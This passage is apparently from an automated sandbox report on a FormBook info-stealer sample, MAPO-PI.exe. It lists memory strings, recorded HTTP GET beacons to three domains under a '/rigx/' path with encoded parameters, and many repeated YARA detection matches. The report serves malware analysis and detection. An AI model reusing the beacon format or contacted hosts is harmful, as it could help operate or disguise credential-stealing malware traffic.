2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 44 69 6f 66 69 73 20 42 65 73 6c 65 6e 6d 65 20 76 65 20 44 69 79 65 74 20 4f 66 69 73 69 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: MAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/#logo
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/#organization
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/#website
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/elma-cayi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/kahvaltilik-tarifler/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/maydanoz-cayi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/meyve-cayi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/odem-cayi-2/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/odem-cayi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/portakalli-meyve-cayi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/rahatlatici-cay/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-corba-tarifi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-roka-salatasi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/saglikli-ve-pratik-salata-tarifi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/sebze-corbasi-tarifi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/10/24/yulafli-kahvalti/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/11/01/cennet-tatlisi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/11/01/cikolatali-toplar/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/11/01/ketojenik-beslenme/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/11/19/aspir-yagi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/?s=
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/bize-ulasin/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/blog/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/category/guncel-diyet-meseleleri/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/category/sporcu-beslenmesi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/category/tarifler/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/comments/feed/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/feed/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hakkimizda/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/bireysel-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/cocukluk-cagi-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/hastaliklarda-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/partnerlerimiz/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.3
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.png
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.png
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-includes/wlwmanifest.xml
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/wp-json/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com/xmlrpc.php?rsd
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: http://www.diofis.com?sccss=1&#038;ver=5.5.6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://api.w.org/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://m0n.co/ga
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://schema.org
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-FE02SN0XC6
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://www.monsterinsights.com/
          Source: cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpString found in binary or memory: https://yoast.com/wordpress/plugins/seo/
          Source: unknownDNS traffic detected: queries for: www.lifeinformpodcast.com
          Source: global trafficHTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1Host: www.lifeinformpodcast.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1Host: www.transforming-leadership.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1Host: www.diofis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: MAPO-PI.exe, 00000000.00000002.237713929.00000000006E0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.275167353.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.264363163.0000000006D3E000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.495966407.0000000003030000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.495159274.0000000002D30000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.236279072.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.235333342.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: MAPO-PI.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.MAPO-PI.exe.3734c80.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.MAPO-PI.exe.36e6660.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.293300061.00000000017B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.293340895.00000000017E0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.238587135.00000000035B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.494133182.0000000000A30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
